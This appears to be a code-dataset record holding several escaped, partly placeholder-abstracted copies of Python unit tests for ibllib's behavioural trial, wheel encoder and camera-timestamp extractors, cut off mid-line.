np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, 